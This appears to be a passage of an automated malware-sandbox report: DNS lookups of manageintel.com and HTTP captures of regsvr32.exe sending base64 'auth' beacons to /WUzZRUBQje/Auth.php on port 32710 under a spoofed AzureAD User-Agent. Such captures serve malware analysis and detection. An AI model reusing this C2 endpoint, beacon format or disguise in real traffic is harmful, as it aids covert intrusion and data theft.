Jan 30, 2022 13:33:58.124003887 CET3271049845185.14.31.158192.168.2.3
Jan 30, 2022 13:33:58.124161959 CET4984532710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:58.124320984 CET4984532710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:58.196116924 CET3271049845185.14.31.158192.168.2.3
Jan 30, 2022 13:33:58.373992920 CET3271049845185.14.31.158192.168.2.3
Jan 30, 2022 13:33:58.374028921 CET3271049845185.14.31.158192.168.2.3
Jan 30, 2022 13:33:58.374174118 CET4984532710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:58.374861002 CET4984532710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:58.398305893 CET3271049845185.14.31.158192.168.2.3
Jan 30, 2022 13:33:58.555911064 CET4984632710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:58.579634905 CET3271049846185.14.31.158192.168.2.3
Jan 30, 2022 13:33:58.579864979 CET4984632710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:58.580157042 CET4984632710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:58.646454096 CET3271049846185.14.31.158192.168.2.3
Jan 30, 2022 13:33:58.817459106 CET3271049846185.14.31.158192.168.2.3
Jan 30, 2022 13:33:58.817599058 CET4984632710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:58.817639112 CET4984632710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:58.841445923 CET3271049846185.14.31.158192.168.2.3
Jan 30, 2022 13:33:59.264086008 CET4984732710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:59.287666082 CET3271049847185.14.31.158192.168.2.3
Jan 30, 2022 13:33:59.287846088 CET4984732710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:59.288182974 CET4984732710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:59.354365110 CET3271049847185.14.31.158192.168.2.3
Jan 30, 2022 13:33:59.512347937 CET3271049847185.14.31.158192.168.2.3
Jan 30, 2022 13:33:59.512392998 CET3271049847185.14.31.158192.168.2.3
Jan 30, 2022 13:33:59.512518883 CET4984732710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:59.513138056 CET4984732710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:59.536941051 CET3271049847185.14.31.158192.168.2.3
Jan 30, 2022 13:33:59.780441999 CET4984832710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:59.804016113 CET3271049848185.14.31.158192.168.2.3
Jan 30, 2022 13:33:59.804223061 CET4984832710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:59.804485083 CET4984832710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:59.870321989 CET3271049848185.14.31.158192.168.2.3
Jan 30, 2022 13:34:00.021991014 CET3271049848185.14.31.158192.168.2.3
Jan 30, 2022 13:34:00.022224903 CET3271049848185.14.31.158192.168.2.3
Jan 30, 2022 13:34:00.022403955 CET4984832710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:00.022484064 CET4984832710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:00.046013117 CET3271049848185.14.31.158192.168.2.3
Jan 30, 2022 13:34:00.178761959 CET4984932710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:00.202195883 CET3271049849185.14.31.158192.168.2.3
Jan 30, 2022 13:34:00.202306986 CET4984932710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:00.202415943 CET4984932710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:00.266427040 CET3271049849185.14.31.158192.168.2.3
Jan 30, 2022 13:34:00.459328890 CET3271049849185.14.31.158192.168.2.3
Jan 30, 2022 13:34:00.459364891 CET3271049849185.14.31.158192.168.2.3
Jan 30, 2022 13:34:00.459558964 CET4984932710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:00.459594965 CET4984932710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:00.483597040 CET3271049849185.14.31.158192.168.2.3
Jan 30, 2022 13:34:00.631620884 CET4985032710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:00.657808065 CET3271049850185.14.31.158192.168.2.3
Jan 30, 2022 13:34:00.657926083 CET4985032710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:00.658077002 CET4985032710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:00.726314068 CET3271049850185.14.31.158192.168.2.3
Jan 30, 2022 13:34:00.914897919 CET3271049850185.14.31.158192.168.2.3
Jan 30, 2022 13:34:00.915029049 CET4985032710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:00.915093899 CET4985032710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:00.938668966 CET3271049850185.14.31.158192.168.2.3
Jan 30, 2022 13:34:01.070036888 CET4985132710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:01.097937107 CET3271049851185.14.31.158192.168.2.3
Jan 30, 2022 13:34:01.098033905 CET4985132710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:01.098141909 CET4985132710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:01.162317991 CET3271049851185.14.31.158192.168.2.3
Jan 30, 2022 13:34:01.365734100 CET3271049851185.14.31.158192.168.2.3
Jan 30, 2022 13:34:01.365839958 CET4985132710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:01.365942955 CET3271049851185.14.31.158192.168.2.3
Jan 30, 2022 13:34:01.366000891 CET4985132710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:01.401371956 CET3271049851185.14.31.158192.168.2.3
Jan 30, 2022 13:34:01.624083042 CET4985232710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:01.647732973 CET3271049852185.14.31.158192.168.2.3
Jan 30, 2022 13:34:01.647836924 CET4985232710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:01.648149967 CET4985232710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:01.714477062 CET3271049852185.14.31.158192.168.2.3
Jan 30, 2022 13:34:01.879401922 CET3271049852185.14.31.158192.168.2.3
Jan 30, 2022 13:34:01.879442930 CET3271049852185.14.31.158192.168.2.3
Jan 30, 2022 13:34:01.879585028 CET4985232710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:01.879640102 CET4985232710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:01.903325081 CET3271049852185.14.31.158192.168.2.3
Jan 30, 2022 13:34:02.053777933 CET4985332710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:02.077593088 CET3271049853185.14.31.158192.168.2.3
Jan 30, 2022 13:34:02.077868938 CET4985332710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:02.077996969 CET4985332710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:02.143173933 CET3271049853185.14.31.158192.168.2.3
Jan 30, 2022 13:34:02.345707893 CET3271049853185.14.31.158192.168.2.3
Jan 30, 2022 13:34:02.345748901 CET3271049853185.14.31.158192.168.2.3
Jan 30, 2022 13:34:02.345968962 CET4985332710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:02.346026897 CET4985332710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:02.372656107 CET3271049853185.14.31.158192.168.2.3
Jan 30, 2022 13:34:02.504776955 CET4985432710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:02.528389931 CET3271049854185.14.31.158192.168.2.3
Jan 30, 2022 13:34:02.528640032 CET4985432710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:02.528935909 CET4985432710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:02.594295025 CET3271049854185.14.31.158192.168.2.3
Jan 30, 2022 13:34:02.774950981 CET3271049854185.14.31.158192.168.2.3
Jan 30, 2022 13:34:02.775115013 CET4985432710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:02.775161982 CET4985432710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:02.798820019 CET3271049854185.14.31.158192.168.2.3
Jan 30, 2022 13:34:02.908405066 CET4985532710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:02.932440042 CET3271049855185.14.31.158192.168.2.3
Jan 30, 2022 13:34:02.932600021 CET4985532710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:02.932660103 CET4985532710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:02.998549938 CET3271049855185.14.31.158192.168.2.3
Jan 30, 2022 13:34:03.160350084 CET3271049855185.14.31.158192.168.2.3
Jan 30, 2022 13:34:03.160394907 CET3271049855185.14.31.158192.168.2.3
Jan 30, 2022 13:34:03.160592079 CET4985532710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:03.160628080 CET4985532710192.168.2.3185.14.31.158
Jan 30, 2022 13:34:03.184103966 CET3271049855185.14.31.158192.168.2.3
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Jan 30, 2022 13:30:33.857294083 CET | 192.168.2.3 | 8.8.8.8 | 0x7cc0 | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:30:45.993905067 CET | 192.168.2.3 | 8.8.8.8 | 0x597a | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:35.122937918 CET | 192.168.2.3 | 8.8.8.8 | 0x5c78 | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:57.296422958 CET | 192.168.2.3 | 8.8.8.8 | 0x70a3 | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:57.659612894 CET | 192.168.2.3 | 8.8.8.8 | 0x655b | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:58.082448006 CET | 192.168.2.3 | 8.8.8.8 | 0xd024 | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:58.536200047 CET | 192.168.2.3 | 8.8.8.8 | 0xbad9 | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:58.946538925 CET | 192.168.2.3 | 8.8.8.8 | 0xf53c | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:59.672009945 CET | 192.168.2.3 | 8.8.8.8 | 0xc2b5 | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:00.161225080 CET | 192.168.2.3 | 8.8.8.8 | 0x4948 | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:00.611428022 CET | 192.168.2.3 | 8.8.8.8 | 0x667e | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:01.050307035 CET | 192.168.2.3 | 8.8.8.8 | 0x68a3 | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:01.506730080 CET | 192.168.2.3 | 8.8.8.8 | 0xebcc | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:02.034220934 CET | 192.168.2.3 | 8.8.8.8 | 0xbd6 | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:02.486901045 CET | 192.168.2.3 | 8.8.8.8 | 0x4708 | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:02.890970945 CET | 192.168.2.3 | 8.8.8.8 | 0xb9ac | Standard query (0) | manageintel.com | A (IP address) | IN (0x0001) |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Jan 30, 2022 13:30:33.965790987 CET | 8.8.8.8 | 192.168.2.3 | 0x7cc0 | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:30:46.100111008 CET | 8.8.8.8 | 192.168.2.3 | 0x597a | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:35.141964912 CET | 8.8.8.8 | 192.168.2.3 | 0x5c78 | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:57.315294981 CET | 8.8.8.8 | 192.168.2.3 | 0x70a3 | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:57.678364038 CET | 8.8.8.8 | 192.168.2.3 | 0x655b | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:58.099420071 CET | 8.8.8.8 | 192.168.2.3 | 0xd024 | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:58.554920912 CET | 8.8.8.8 | 192.168.2.3 | 0xbad9 | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:59.262975931 CET | 8.8.8.8 | 192.168.2.3 | 0xf53c | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:33:59.778824091 CET | 8.8.8.8 | 192.168.2.3 | 0xc2b5 | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:00.178107023 CET | 8.8.8.8 | 192.168.2.3 | 0x4948 | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:00.630093098 CET | 8.8.8.8 | 192.168.2.3 | 0x667e | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:01.069185972 CET | 8.8.8.8 | 192.168.2.3 | 0x68a3 | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:01.621577024 CET | 8.8.8.8 | 192.168.2.3 | 0xebcc | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:02.052918911 CET | 8.8.8.8 | 192.168.2.3 | 0xbd6 | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:02.503182888 CET | 8.8.8.8 | 192.168.2.3 | 0x4708 | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |
| Jan 30, 2022 13:34:02.907778978 CET | 8.8.8.8 | 192.168.2.3 | 0xb9ac | No error (0) | manageintel.com | | 185.14.31.158 | A (IP address) | IN (0x0001) |

  • manageintel.com
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.3 | 49759 | 185.14.31.158 | 443 | C:\Windows\SysWOW64\regsvr32.exe |

| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 1 | 192.168.2.3 | 49761 | 185.14.31.158 | 443 | C:\Windows\SysWOW64\regsvr32.exe |

| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 10 | 192.168.2.3 | 49848 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe |

| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| Jan 30, 2022 13:33:59.804485083 CET | 14269 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1 |
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
| Jan 30, 2022 13:34:00.021991014 CET | 14270 | IN | HTTP/1.1 200 OK |
Date: Sun, 30 Jan 2022 12:34:02 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 28
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 11 | 192.168.2.3 | 49849 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe |

| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| Jan 30, 2022 13:34:00.202415943 CET | 14271 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1 |
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
| Jan 30, 2022 13:34:00.459328890 CET | 14271 | IN | HTTP/1.1 200 OK |
Date: Sun, 30 Jan 2022 12:34:02 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 28
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49850 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2022 13:34:00.658077002 CET | 14272 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:00.914897919 CET | 14273 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:34:03 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 28
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49851 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2022 13:34:01.098141909 CET | 14274 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:01.365734100 CET | 14274 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:34:03 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 28
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.3 | 49852 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2022 13:34:01.648149967 CET | 14275 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:01.879401922 CET | 14275 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:34:04 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 28
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.3 | 49853 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2022 13:34:02.077996969 CET | 14276 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:02.345707893 CET | 14277 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:34:04 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 28
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.3 | 49854 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2022 13:34:02.528935909 CET | 14278 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:02.774950981 CET | 14278 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:34:05 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 28
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.3 | 49855 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2022 13:34:02.932660103 CET | 14279 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:03.160350084 CET | 14280 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:34:05 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 28
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49764 | 185.14.31.158 | 443 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49841 | 185.14.31.158 | 443 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49762 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2022 13:30:46.144690990 CET | 2014 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 549
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Jan 30, 2022 13:30:46.408647060 CET | 2015 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:30:48 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 220
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiWHJwbzNLQ0QwWGtVSDBaYkNoT1VWQT09Iiwiblg4eSI6IkorZzk5cW5RZ2h4UkcwOVRLMUhFQVF3TDBaVjlmYXdKRDVKSlNLaUdSNkNjMEVSUiIsInJKcVUiOiJlNnR4NEx6WW1nVVJHMFJXTGhtWlgwdGRrTm9wYzZVTGJmY0VJWjdqTThLVmpWTVM4M1BWM0dhd1JzV0gifQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49843 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2022 13:33:57.379771948 CET | 14262 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 561
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Jan 30, 2022 13:33:57.634951115 CET | 14263 | IN | HTTP/1.1 200 OK
Date: Sun, 30 Jan 2022 12:34:00 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0
X-Powered-By: PHP/8.1.0
Content-Length: 28
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49844 | 185.14.31.158 | 32710 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2022 13:33:57.704222918 CET | 14264 | OUT | POST /WUzZRUBQje/Auth.php HTTP/1.1
User-Agent: Windows-AzureAD-Authentication-Provider/11.0
Host: manageintel.com
Content-Length: 245
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
